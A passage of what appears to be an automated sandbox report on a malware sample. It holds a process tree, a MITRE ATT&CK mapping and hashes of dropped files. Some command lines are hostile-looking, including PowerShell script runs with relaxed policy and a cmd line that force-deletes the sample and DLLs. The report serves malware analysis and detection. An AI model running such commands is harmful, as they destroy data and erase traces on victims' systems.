                                                                                          7⤵
                                                                                            PID:3588
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                              PID:4908
                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                              7⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:6040
                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                8⤵
                                                                                                • Loads dropped DLL
                                                                                                • Drops file in System32 directory
                                                                                                PID:4404
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                              7⤵
                                                                                                PID:5316
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                • Drops file in Program Files directory
                                                                                                PID:5924
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:3544
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:5604
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyB3C2.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                    • Loads dropped DLL
                                                                                                    PID:4236
                                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Drops file in Program Files directory
                                                                                                    PID:4044
                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                        1⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2192
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                          2⤵
                                                                                          • Drops file in System32 directory
                                                                                          • Checks processor information in registry
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:4764
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                        1⤵
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies Internet Explorer settings
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:4188
                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                        1⤵
                                                                                        • Modifies Internet Explorer settings
                                                                                        PID:4596
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        PID:4320
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                        1⤵
                                                                                        • Enumerates connected drives
                                                                                        • Drops file in Program Files directory
                                                                                        • Drops file in Windows directory
                                                                                        • Modifies data under HKEY_USERS
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4640
                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding F36210D78E38AB333125E8BAEC79601D C
                                                                                          2⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:5356
                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 67E0351CD02C0CB46490418B95C81733
                                                                                          2⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Loads dropped DLL
                                                                                          PID:5844
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                            3⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:5456
                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 9D06B971A799663BEB28A3E9BD7EB36B E Global\MSI0000
                                                                                          2⤵
                                                                                            PID:4236
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies Internet Explorer settings
                                                                                          • Modifies registry class
                                                                                          PID:4592
                                                                                        • C:\Users\Admin\AppData\Local\Temp\81FD.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\81FD.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:1188
                                                                                        • C:\Users\Admin\AppData\Local\Temp\AECB.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\AECB.exe
                                                                                          1⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5956
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                            2⤵
                                                                                              PID:4380
                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                timeout 1
                                                                                                3⤵
                                                                                                • Delays execution with timeout.exe
                                                                                                PID:2876
                                                                                            • C:\Users\Admin\AppData\Local\Temp\AECB.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\AECB.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks processor information in registry
                                                                                              PID:1496
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im AECB.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\AECB.exe" & del C:\ProgramData\*.dll & exit
                                                                                                3⤵
                                                                                                  PID:4824
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im AECB.exe /f
                                                                                                    4⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:4392
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /t 6
                                                                                                    4⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:4272
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 1488
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4360
                                                                                            • C:\Users\Admin\AppData\Local\Temp\B757.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\B757.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:5584
                                                                                              • C:\Users\Admin\AppData\Local\Temp\B757.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\B757.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:920
                                                                                            • C:\Users\Admin\AppData\Local\Temp\BD92.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\BD92.exe
                                                                                              1⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:5628
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 736
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:6028
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 748
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4384
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 752
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4680
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 896
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4160
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1188
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4724
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1220
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4220
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1372
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4456
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1280
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:5472
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1360
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4424
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1504
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:5444
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1612
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4808
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1344
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:5144
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1312
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4412
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1412
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4988
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1328
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4204
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1524
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:6048
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1652
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:5864
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1716
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:6020
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1820
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:5348
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1848
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4824
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1912
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:5632
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1760
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:5852
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1988
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4948
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 2028
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Program crash
                                                                                                PID:2312
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1932
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:5368
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1832
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:5408
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1860
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4616
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 2032
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:5840
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1984
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4304
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1948
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:1512
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1852
                                                                                                2⤵
                                                                                                • Program crash
                                                                                                PID:4368
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 1916
                                                                                                2⤵
                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                • Program crash
                                                                                                PID:4624
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:4564
                                                                                              • C:\Windows\explorer.exe
                                                                                                C:\Windows\explorer.exe
                                                                                                1⤵
                                                                                                  PID:1716
                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:5928
                                                                                                  • C:\Windows\explorer.exe
                                                                                                    C:\Windows\explorer.exe
                                                                                                    1⤵
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:5324
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:5836
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:5908
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:5812
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:3812
                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                        1⤵
                                                                                                          PID:2492
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                          1⤵
                                                                                                            PID:4516
                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                            1⤵
                                                                                                              PID:4492
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                              1⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:5484
                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                              1⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              PID:4716
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:6040
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:4336
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:4772
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:4688
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:2728
                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                              1⤵
                                                                                                              • Modifies registry class
                                                                                                              PID:2272
                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                              1⤵
                                                                                                                PID:3180
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                1⤵
                                                                                                                  PID:4056

                                                                                                                Network

                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                Execution

                                                                                                                Scheduled Task

                                                                                                                1
                                                                                                                T1053

                                                                                                                Persistence

                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                1
                                                                                                                T1060

                                                                                                                Scheduled Task

                                                                                                                1
                                                                                                                T1053

                                                                                                                BITS Jobs

                                                                                                                1
                                                                                                                T1197

                                                                                                                Privilege Escalation

                                                                                                                Scheduled Task

                                                                                                                1
                                                                                                                T1053

                                                                                                                Defense Evasion

                                                                                                                Disabling Security Tools

                                                                                                                2
                                                                                                                T1089

                                                                                                                Modify Registry

                                                                                                                5
                                                                                                                T1112

                                                                                                                BITS Jobs

                                                                                                                1
                                                                                                                T1197

                                                                                                                Install Root Certificate

                                                                                                                1
                                                                                                                T1130

                                                                                                                Credential Access

                                                                                                                Credentials in Files

                                                                                                                5
                                                                                                                T1081

                                                                                                                Discovery

                                                                                                                Software Discovery

                                                                                                                1
                                                                                                                T1518

                                                                                                                Query Registry

                                                                                                                5
                                                                                                                T1012

                                                                                                                System Information Discovery

                                                                                                                5
                                                                                                                T1082

                                                                                                                Security Software Discovery

                                                                                                                1
                                                                                                                T1063

                                                                                                                Peripheral Device Discovery

                                                                                                                2
                                                                                                                T1120

                                                                                                                Remote System Discovery

                                                                                                                1
                                                                                                                T1018

                                                                                                                Collection

                                                                                                                Data from Local System

                                                                                                                5
                                                                                                                T1005

                                                                                                                Command and Control

                                                                                                                Web Service

                                                                                                                1
                                                                                                                T1102

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                  MD5

                                                                                                                  7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                  SHA1

                                                                                                                  804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                  SHA256

                                                                                                                  bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                  SHA512

                                                                                                                  49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                  MD5

                                                                                                                  7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                  SHA1

                                                                                                                  804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                  SHA256

                                                                                                                  bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                  SHA512

                                                                                                                  49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                • C:\Program Files\Windows Mail\ZOHNVVSTLV\ultramediaburner.exe
                                                                                                                  MD5

                                                                                                                  6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                  SHA1

                                                                                                                  938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                  SHA256

                                                                                                                  b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                  SHA512

                                                                                                                  a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                • C:\Program Files\Windows Mail\ZOHNVVSTLV\ultramediaburner.exe
                                                                                                                  MD5

                                                                                                                  6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                  SHA1

                                                                                                                  938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                  SHA256

                                                                                                                  b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                  SHA512

                                                                                                                  a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\02wkif1t.mxf\huesaa.exe
                                                                                                                  MD5

                                                                                                                  646428f3a2c7fe50913dcd8458d53ae4

                                                                                                                  SHA1

                                                                                                                  a129d6ba974213d0a90273161f1baabdfb871521

                                                                                                                  SHA256

                                                                                                                  e27fe72920360973cd116caadff51ef457a090c5ca680c860999a8b195c669e3

                                                                                                                  SHA512

                                                                                                                  6864d8092991fcfb2b67a5b43fd9a1cb85f68df084f32357f61876992adde7745ecac619173067a2474650905c9fe86ccc4c7097568c5d7f2f46d1de8cfbdb15

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\02wkif1t.mxf\huesaa.exe
                                                                                                                  MD5

                                                                                                                  646428f3a2c7fe50913dcd8458d53ae4

                                                                                                                  SHA1

                                                                                                                  a129d6ba974213d0a90273161f1baabdfb871521

                                                                                                                  SHA256

                                                                                                                  e27fe72920360973cd116caadff51ef457a090c5ca680c860999a8b195c669e3

                                                                                                                  SHA512

                                                                                                                  6864d8092991fcfb2b67a5b43fd9a1cb85f68df084f32357f61876992adde7745ecac619173067a2474650905c9fe86ccc4c7097568c5d7f2f46d1de8cfbdb15

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1z4kfjdp.n2m\005.exe
                                                                                                                  MD5

                                                                                                                  0422002ffd305cccc4e8ab7fc54fd02b

                                                                                                                  SHA1

                                                                                                                  c43215adba2626e1ca616c89b61ef2eeddb2a4c1

                                                                                                                  SHA256

                                                                                                                  8beb68608e34dd4a6e7158d753e9a760ba7b89c41bc2dbbb7eb70397e5af5b92

                                                                                                                  SHA512

                                                                                                                  063ef73deabc344926fd6ac5a1c0cb4952ecf422bf7da8e2190bb00763763b5bee4bd4cadb3f7beff8e0309824764ed3bee9370421e44b467f1ae549adedf739

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1z4kfjdp.n2m\005.exe
                                                                                                                  MD5

                                                                                                                  0422002ffd305cccc4e8ab7fc54fd02b

                                                                                                                  SHA1

                                                                                                                  c43215adba2626e1ca616c89b61ef2eeddb2a4c1

                                                                                                                  SHA256

                                                                                                                  8beb68608e34dd4a6e7158d753e9a760ba7b89c41bc2dbbb7eb70397e5af5b92

                                                                                                                  SHA512

                                                                                                                  063ef73deabc344926fd6ac5a1c0cb4952ecf422bf7da8e2190bb00763763b5bee4bd4cadb3f7beff8e0309824764ed3bee9370421e44b467f1ae549adedf739

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5lqopdlk.urx\toolspab1.exe
                                                                                                                  MD5

                                                                                                                  cd0af9ec6574068123a67d11486d17b7

                                                                                                                  SHA1

                                                                                                                  830ead75c8867665475f13e26434974544c67ac5

                                                                                                                  SHA256

                                                                                                                  1e862fd48f284e5ae4859203c25781fd19dd31b05302342d556480f11c763062

                                                                                                                  SHA512

                                                                                                                  0121b1f13817eb5c46c6fd039cf064d9bc0861ef4b7e42f52e25089541cc063c4debf1d05a2ab4d1d7712194fc18074e3adc46afdf23c4c360259cb352a64e8f

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5lqopdlk.urx\toolspab1.exe
                                                                                                                  MD5

                                                                                                                  cd0af9ec6574068123a67d11486d17b7

                                                                                                                  SHA1

                                                                                                                  830ead75c8867665475f13e26434974544c67ac5

                                                                                                                  SHA256

                                                                                                                  1e862fd48f284e5ae4859203c25781fd19dd31b05302342d556480f11c763062

                                                                                                                  SHA512

                                                                                                                  0121b1f13817eb5c46c6fd039cf064d9bc0861ef4b7e42f52e25089541cc063c4debf1d05a2ab4d1d7712194fc18074e3adc46afdf23c4c360259cb352a64e8f

                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5lqopdlk.urx\toolspab1.exe
                                                                                                                  MD5

